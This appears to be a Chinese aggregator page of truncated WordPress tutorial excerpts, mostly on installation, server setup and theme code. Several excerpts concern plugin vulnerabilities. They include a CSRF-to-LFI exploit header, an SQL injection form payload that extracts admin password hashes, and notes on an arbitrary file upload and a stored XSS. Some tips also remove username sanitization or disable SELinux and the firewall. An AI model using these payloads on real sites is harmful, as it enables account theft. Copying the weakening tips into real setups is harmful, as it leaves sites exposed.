WORDPRESS - 技术教程文章
centos/RHEL 7.6 使用yum安装php7.3(方便wordpress的php7.3需求,并解决了libphp7.so缺失问题)【代码】
我最近想安装一个wordpress, 但是官网介绍需要php7.3以上版本,但是百度了一下,都是要编译安装。为此,我想,centos..., php... 两大当红辣子鸡没有yum安装方式,简直不可能。为此,我搜寻了各种源,发现remi源有php73。但是我yum install 以后,发现两个致命的问题:(1)php -v 不会显示任何东西,要php73 -v 才行(2)建立一个phpinfo的测试页,没有任何反应,据研究是apache缺乏libphp7.so模块,各种教程都让我编译的时候加一...
Wordpress+LNMP 环境搭建笔记【图】
搭建WordPress笔记一、搭建LNMP环境(Centos 6.8 64)1、使用 yum 安装 Nginx: yum install nginx -y2、修改 /etc/nginx/conf.d/default.conf,去除对 IPv6 地址的监听 ,可参考下面的示例: server { listen 80 default_server; # listen [::]:80 default_server; server_name _; root /usr/share/nginx/html; # Load configuration files for the default server block. includ...
wordpress提示No input file specified的解决办法
最近wordpress搬家到了win上面,发现打开网站提示“No input file specified.”。度娘一下,各种回复更改php.ini文件的,但是各种折腾发现都没有效果。苦苦钻研,咳咳。。。。。。终于发现是PHP版本的问题,重新切换到低版本的就解决了,哎。 本文地址:https://www.lisen.me/237.html版权声明:本文为原创文章,版权归 李森的博客 所有,欢迎分享本文,转载请保留出处!原文:http://www.cnblogs.com/ilisen/p/7103118.html
wordpress 中使用自带 admin-ajax.php【代码】
1前端页面 <script type="text/javascript">jQuery.ajax({type: ‘POST‘,url: "<?php echo admin_url( ‘admin-ajax.php‘ );?>",data: {action: ‘myajax_submit‘},success: function(res) {console.log(JSON.stringify("--"+res));}});</script> 2 后端functions.php里面接受请求 add_action( ‘wp_ajax_nopriv_myajax_submit‘, ‘myajax_submit‘ ); add_action( ‘wp_ajax_myajax_submit‘, ‘myajax_submit‘ );function ...
LNMP项目实战-WordPress站点搭建
LNMP项目实战:L:Linux(centos 7.6) http://mirrors.cqu.edu.cn/CentOS/7.6.1810/isos/x86_64/N:Nginx(1.12.2) https://nginx.org/en/download.htmlM:MySQL(5.6.43) https://dev.mysql.com/downloads/mysql/5.6.html#downloadsP:PHP(7.2.15) http://php.net/downloads.phpWorldpress(5.0.3):https://cn.wordpress.org/download/-----准备虚拟机型192.168.55.3 nginx php-fpm 192.168.55.5 mysql准备的包****ma...
Wordpress php 分页代码【图】
效果:将下面的函数放到你的主题的 functions.php 文件中:复制代码 代码如下:function theme_echo_pagenavi(){ global $request, $posts_per_page, $wpdb, $paged; $maxButtonCount = 9; //显示的最多链接数目 if (!is_single()) { if(!is_category()) { preg_match(‘#FROM\s(.*)\sORDER BY#siU‘, $request, $matches); } else { preg_match(‘#FROM\s(.*)\sGROUP BY#siU‘, $request, $matches); } $fromwhere = $matches[1]; $n...
WordPress Plugin Form Maker [CSRF → LFI] vulnerable 2019-03-17【代码】
# Title: Form Maker by WD [CSRF → LFI]# Date: 2019-03-17# Exploit Author: Panagiotis Vagenas# Vendor Homepage: http://web-dorado.com/# Software Link: https://wordpress.org/plugins/form-maker# Version: 1.13.2# Tested on: WordPress 5.1Description-----------Plugin implements the following AJAX actions:- `generete_csv`- `generete_xml`- `formmakerwdcaptcha`- `formmakerwdmathcaptcha`- `product_option`-...
如何配置XAMPP并搭建自己的本地wordpress博客(1)【图】
配置ApacheXAMPP(Apache+MySQL+PHP+PERL)是一个功能强大的建站集成软件包。这个软件包原来的名字是 LAMPP,但是为了避免误解,最新的几个版本就改名为 XAMPP 了。它可以在Windows、Linux、Solaris、Mac OS X 等多种操作系统下安装使用,支持多语言:英文、简体中文、繁体中文、韩文、俄文、日文等。许多人通过他们自己的经验认识到安装 Apache 服务器是件不容易的事儿。如果您想添加 MySQL、PHP 和 Perl,那就更难了。XAMPP 是一...
WordPress中文汉字username不能注冊怎么办?【代码】
WordPress注冊用户是不支持中文的。可是近期在项目中须要用到中文注冊。后来想到了简单的处理办法:打开 wp-includes/formatting.php。找到function sanitize_user( $username, $strict = false ) { 把 $strict 强制指定为 false。即在 sanitize_user 这行函数的下一行加入例如以下代码$strict = false;或者凝视掉//$username = preg_replace( ‘|[^a-z0-9 _.\-@]|i‘, ‘‘, $username );这样就一切OK了!只是,须要注意的是,在下...
Wordpress 如何隐藏”添加媒体”按钮
在多用户WordPress站点, 如果给用户开启了编辑权限, 那么无论是一般作者还是编辑在撰写文章时都会用到添加媒体功能. 但是我们却又不想给一些级别作者添加媒体的权利或者只想每个用户只能上传并管理自己的媒体文件, 不能编辑他人的媒体.这篇文章的教程就是教会大家如何隐藏”添加媒体”按钮与限定作者只能看到及编辑自己的媒体文件.只要不是管理员就隐藏”添加媒体”按钮下面这段代码设置只要权限等级不是最高等级level_10就隐藏掉...
搭建 LNMP+WordPress 环境
搭建 LAMP + WORDPRESS 环境一、环境介绍二、必装依赖软件三、编译安装 Nginx-1.6.3四、二进制安装 MYSQL-5.5.33五、编译安装 PHP-5.3.27六、检测 nginx与mysql nginx与php 是否相连七、安装 wordpress (分别基于IP,域名访问)一、环境介绍搭建这个环境,所有服务都安装在一台虚拟机中,在此介绍一下我的虚拟机CentOS-6.7-x86_64 保证虚拟机可以正常上网IP:192.168.6.36hostname:yuci关闭 iptbales selinux650) this.wid...
wordpress seo 优化技巧
WordPress系统本身,默认安装的情况下使用默认模板,实际上对搜索引擎并不友好,并没有针对搜索引擎进行很好的设计,下面我介绍一些技巧和方法可以使得WordPress能否对搜索引擎更为友好。 1、文章URL链接结构的优化 Permalink里面要包含postname.一般的服务器都支持mod_rewrite功能,使用这个功能可以优化Permalink(永久链接),在Option-Permalink里的Common options里进行设置,我比较倾向于使用/%year%/%monthnum%/%post...
修改wordpress地址(URL)导致不能登录后台【代码】
闲来无事,看见 设置--常规 有个WordPress地址(URL)和站点地址(URL),手贱把两个地址后面的/wordpress 后缀去掉了,结果造成博客后台无法登录,文章页面排版混乱。解决办法:Linux中进入mysqlmysql> show databases; #显示有哪些数据库 mysql> use wordpress; #选择使用wordpress的数据库 mysql> show tables; #显示有哪些表 select * from wp_options limit 0,5 ; #查询wp_options表中的内容,并只查看前5行 update wp_options...
linux下搭建属于自己的博客(WordPress安装)
转自:http://www.cnblogs.com/xiaofengkang/archive/2011/11/16/2251608.html WordPress简介 WordPress 是一种使用 PHP语言和 MySQL数据库开发的开源、免费的Blog(博客,网志)引擎,用户可以在支持 PHP 和 MySQL 数据库的服务器上建立自己的 Blog。WordPress 是一个功能非常强大的博客系统,插件众多,易于扩充功能。安装和使用都非常方便。目前 WordPress 已经成为主流的 Blog 搭建平台。现在我们开始搭建属于自己的blog: ...
WordPress无插件实现游客投稿功能
WordPress不安装插件如何实现游客投稿功能?SEO博客推荐下面方法轻松实现。首先,复制文件page.php重命名为contribute.php。其次,将contribute.php文件中,在<?php get_header(); ?>前面添加如下代码:<?php/*Template Name:游客投稿*/if(isset($_POST[‘contributeform‘])&&$_POST[‘contributeform‘]==‘send‘){ global $wpdb; $last_post=$wpdb->get_var("SELECT post_date FROM $wpdb->posts WHERE post_type = ‘po...
腾讯云服务器手动和自动安装WordPress网站程序
如果我们需要建站的话,对于基础个人网站、博客建站选择基础的1Mbps带宽配置的1GB内存的腾讯云服务器还是够用的,且如果我们需要用来建网站的话可以手工添加程序,以及有些面板,比如宝塔面板是自带CMS程序可以直接快速安装WordPress程序的。在这篇文章中,腾讯云专题网就简单演示我们在腾讯云服务器中如何手动和自动快速安装WordPress网站程序的过程。第一、选择云服务器和配置WEB1、参考"腾讯云服务器CVM购买详细过程 选择我们需...
WordPress主题制作教程11:伪静态设置方法【代码】
设置固定链接-自定义结构:/%post_id%.html想设置其他链接格式,可参考以下结构标签:%year%:日志发表的年份,如2009%monthnum%:日志发表的月份,如05%day%:日志发表的日期,如28%hour%:日志发表的时间(小时),如15%minute%:日志发表的时间(分钟),如43%second%:日志发表的时间(秒),如33%postname%:文章名。%post_id%:日志ID,如423%category%:分类名称的缩略版本(添加新分类/编辑界面上的分类别名)。嵌套的子分...
云计算学习路线教程大纲课件:部署博客系统wordpress
云计算学习路线教程大纲课件:部署博客系统wordpress: ========================================================一、基础环境[已完成][root@apache ~]# sed -ri ‘/^SELINUX=/cSELINUX=disabled‘ /etc/selinux/config[root@apache ~]# setenforce 0[root@apache ~]# systemctl stop firewalld.service[root@apache ~]# systemctl disable firewalld.service二、安装LAMP[已完成][root@apache ~]# yum -y install httpd mar...
apache里的wordpress伪静态永久规则(百度的)
RewriteEngine on RewriteCond %{REQUEST_FILENAME} !-fRewriteCond %{REQUEST_FILENAME} !-d#RewriteRule . /index.php [L]RewriteRule /sitemap.xml /sitemap\.xml [L]RewriteRule /wp-(.*) /wp-$1 [L]RewriteRule ^/$ /index\.php [L]RewriteRule /(.*) /index\.php/$1 [L]RewriteRule /tag/(.*) /index\.php\?tag=$1RewriteRule /(contact|about|sitemap|services|update-log|privacy|tools|links|exchange)/ /index\.php\?pag...
来来来,个人blog第一弹——WordPress的Linux运行环境【代码】
基本上就是安装Lamp一、准备Linux这里用的centos 6.5二、安装Apacheyum install httpd三、安装mysql+建库yum install mysql-server mysql_secure_installation mysqladmin -uroot password root mysql -uroot -proot mysql>create database wordpress;四、安装phpyum install php5 yum install phpmyadmin五、解压WordPress包unzip WordPress.zip /var/www/html/参考:http://www.cnblogs.com/xiaofengkang/archive/2011/11/16/225...
wordpress plugins sql injection
<*form method="post"action="http://***/wp-admin/admin-ajax.php?action=get_upcp_subcategories"><*input type="text" name="CatID" value="0 UNION SELECTuser_login,user_pass FROM wp_users WHERE ID=1"><*input type="submit">通过提交的value https://***/wp-admin/admin.php?page=examapp_UserResult&info=view&id=79 and 1=1 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHE...
也谈WordPress获取文章中首张图片【代码】
从第一次接触WordPress开始,在前台首页需要调用文章中的图片以实现在首页显示图片文章,就看到网络上流传甚广的一个函数: 1function catch_that_image() {2global$post, $posts;3$first_img = ‘‘;4ob_start();5ob_end_clean();6$output = preg_match_all(‘/<img.+src=[\‘"]([^\‘"]+)[\‘"].*>/i‘, $post->post_content, $matches); 7$first_img = $matches [1][0];8 9if(empty($first_img)){ 10$first_img = "/default.jp...
本地wordpress博客系统安装搭建实践
我们按步骤来,(1)安装XAMPP集成软件包wordpress 的运行要求是在 php + MySQL + Apache的服务器环境,所以要先搭建该环境,我用的是XAMPP软件包,安装很方便。下载地址:http://baoku.360.cn/soft/show/appid/346 安装XAMPP的过程,就不多说了,我要提的是,遇到的问题,我发现只有安装到系统默认的C盘,(C:\xampp) MySQL 启动才会正常,按说,安装到其他盘符也应该正常启动,不知道问题出在哪儿(求正解) ,或许跟系统配置有...
分布式部署lamp,phpmyadmin,wordpress的安装与应用【代码】【图】
系统环境:centos7,httpd-2.4,php-5.5,mariadb5.5192.168.1.20 httpd192.168.1.30 PHP192.168.1.40 mariadb修改客户机hosts文件[root@bogon Desktop]# vim /etc/hosts 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 192.168.1.20 www.pma.com www.wp.com 在192.168.1.20上安装httpd服务[root@localhost yum.re...
WordPress菜单“显示选项”无法显示的解决办法
比较新版本的WordPress会出现点击“外观”——“菜单”右上角的“显示选项”无法打开的问题,而老版本的就没有这个问题,后台的其他页面中的这个 功能都可以正常使用,看来问题是因为中文版WordPress 里的后台菜单管理文件导致的,所以,最简单的解决方法就是用之前版本的相关文件替换使用。下载地址:http://yunpan.cn/cFwHkpkXQRk78访问密码 f516。上传到网站的 /wp-admin/目录,替换里面的 nav-menus.php 即可,覆盖之后就可以正...
【docker构建】基于docker构建wordpress博客网站平台【代码】【图】
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。 WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的。用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。 WordPress有许多第三方开发的免费模板,安装方式简单易用。不过要做一个自己的模板,则需要...
Wordpress 优化小结 杜绝博客因为CPU 占用过高被封【图】
我的博客www.waitingfy.com因为备案被取消了,所以就用了美国www.ixwebhosting.com的虚拟主机。美国虚拟主机有个特点,什么带宽无限,存储空间无限,无限绑定域名个数。但它不会告诉你CPU和内存是有限的,一旦你超过它的限定,你的域名就会被封。我的就被封了!我的博客平均访问量就40-50左右,节假日更低,怎么会超出CPU限定呢?答案是大量机器人访问。查看Apache的 log,发现日请求40000次左右。下面来谈谈wordpress博客的优化技...
wordpress /wp-content/plugins/wp-symposium/server/php/UploadHandler.php File Arbitrary Upload Vul【代码】
catalog1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述Relevant Link:2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析/wp-content/plugins/wp-symposium/server/php/UploadHandler.phpfunction __construct($options = null, $initialize = true, $error_messages = null) { if (isset($_POST[‘uploader_uid‘]) && isset($_POST[‘uploader_url‘])) { $upload_dir...
WordPress二级菜单设置
关于二级菜单的设置,首先建立几个自己的分类目录,然后打开菜单设置界面,用鼠标自由拖动即可。注意,这里说的一级菜单和二级菜单都是分类目录,所 以我们写文章的时候应该同时选择一级菜单和二级菜单两个分类目录才对,(这也是最常使用的一种设置方式)比如我写了一篇关于“图形图像”的文章,那么我们 选择文章分类目录的时候就应该选择“软件”和“图形图像”而不是只选择“图形图像”,如果只选择了“图形图像”,那么我们点...
WordPress <4.1.2 & <=4.2 存储型xss(利用mysql对特殊字符和超长字符会进行截断的特性)【代码】
转自:Baidu Security Lab Xteam http://xteam.baidu.com/?p=177漏洞概述本次漏洞出现两个使用不同方式截断来实现的存储型xss,一种为特殊字符截断,一种为数据库字段长度截断,该漏洞导致攻击者可获取用户 cookie以及模拟浏览器正常操作,并且当管理员访问到注入的payload时,结合wordpress后台功能甚至可以getshell。 漏洞分析1.字符截断通过官网介绍“The character set named utf8 uses a maximum of three bytes per characte...